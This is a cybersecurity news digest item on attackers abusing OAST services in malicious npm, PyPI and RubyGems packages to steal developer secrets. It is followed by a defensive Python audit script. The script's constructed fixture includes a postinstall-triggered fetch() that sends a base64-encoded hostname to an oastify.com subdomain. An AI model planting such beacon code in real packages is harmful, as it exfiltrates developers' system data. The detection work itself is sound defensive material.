CyberSecurity updates
2025-01-09 13:27:58 Pacific

Hackers Weaponize OAST in NPM, PYPI, Ruby - 1d
Read more: securityonline.info

Hackers are increasingly weaponizing legitimate security testing tools, specifically Out-of-Band Application Security Testing (OAST) techniques, within the npm, PyPI, and RubyGems ecosystems. Malicious packages are being used to exfiltrate sensitive data and establish command-and-control channels, allowing multi-stage attacks to run over what appears to be legitimate infrastructure. These packages often impersonate genuine libraries to steal developer secrets. For example, one campaign targeted Ethereum developers by mimicking Hardhat plugins to obtain private keys and configuration details. In some cases, threat actors combine methods, from inflated version numbers ("high versioning") to typosquatting of package names, to deceive developers into downloading the malicious payloads.

These malicious packages are collecting a range of information, including user system information like hostname, username, working directories, and private keys. This data is often encrypted and transmitted to attacker-controlled endpoints using hardcoded keys and Ethereum addresses. Notably, OAST services such as oastify.com and oast.fun are being abused to exfiltrate this stolen information. This method is particularly dangerous as it allows attackers to perform stealthy reconnaissance and data theft while bypassing basic intrusion detection systems. The exploitation of these ecosystems underscores the need for developers to be vigilant and implement stricter auditing practices.
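As an added example (not code from the article or from any package it describes), the following Python audit applies the report's indicators to a package before installation: install-time hooks in package.json, callbacks to the named OAST domains (oastify.com, oast.fun), and host-fingerprinting calls appearing next to such callbacks. The package name, file contents and OAST subdomain in the sample are constructed.

```python
import json
import re

OAST_DOMAINS = ("oastify.com", "oast.fun")  # services named in the report; extend as needed
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Node APIs that yield the host/user data the report says is being harvested
FINGERPRINT_APIS = (r"os\.hostname\(\)", r"os\.userInfo\(\)", r"process\.cwd\(\)")

_OAST_RE = re.compile(
    r"\b(?:[a-z0-9][a-z0-9.-]*\.)?(?:" + "|".join(re.escape(d) for d in OAST_DOMAINS) + r")\b",
    re.IGNORECASE,
)


def find_oast_hosts(text):
    """Return every hostname in text that sits under an OAST service domain."""
    return sorted(set(_OAST_RE.findall(text)))


def audit_package(package_json, files):
    """package_json: text of package.json; files: {path: source}. Returns a list of findings."""
    findings = []
    scripts = json.loads(package_json).get("scripts", {})
    for hook in INSTALL_HOOKS:  # code that runs at install time, before any review
        if hook in scripts:
            findings.append(f"install hook '{hook}': {scripts[hook]}")
            findings.extend(f"OAST host in '{hook}' hook: {h}" for h in find_oast_hosts(scripts[hook]))
    for path, src in files.items():
        hosts = find_oast_hosts(src)
        findings.extend(f"OAST host in {path}: {h}" for h in hosts)
        # Fingerprinting alone is common; fingerprinting plus an OAST callback is the exfil pattern
        if hosts and any(re.search(api, src) for api in FINGERPRINT_APIS):
            findings.append(f"{path}: host fingerprinting combined with OAST callback")
    return findings


# Constructed sample: a plugin-like package with a postinstall hook that beacons host data out
SAMPLE_PACKAGE_JSON = '{"name": "constructed-example-plugin", "version": "99.1.0", "scripts": {"postinstall": "node setup.js"}}'
SAMPLE_FILES = {
    "setup.js": 'const os = require("os");\nconst h = os.hostname();\n'
                'fetch("https://abc123.oastify.com/" + Buffer.from(h).toString("base64"));\n',
    "index.js": "module.exports = { task: () => 1 };\n",
}

if __name__ == "__main__":
    for finding in audit_package(SAMPLE_PACKAGE_JSON, SAMPLE_FILES):
        print(finding)
```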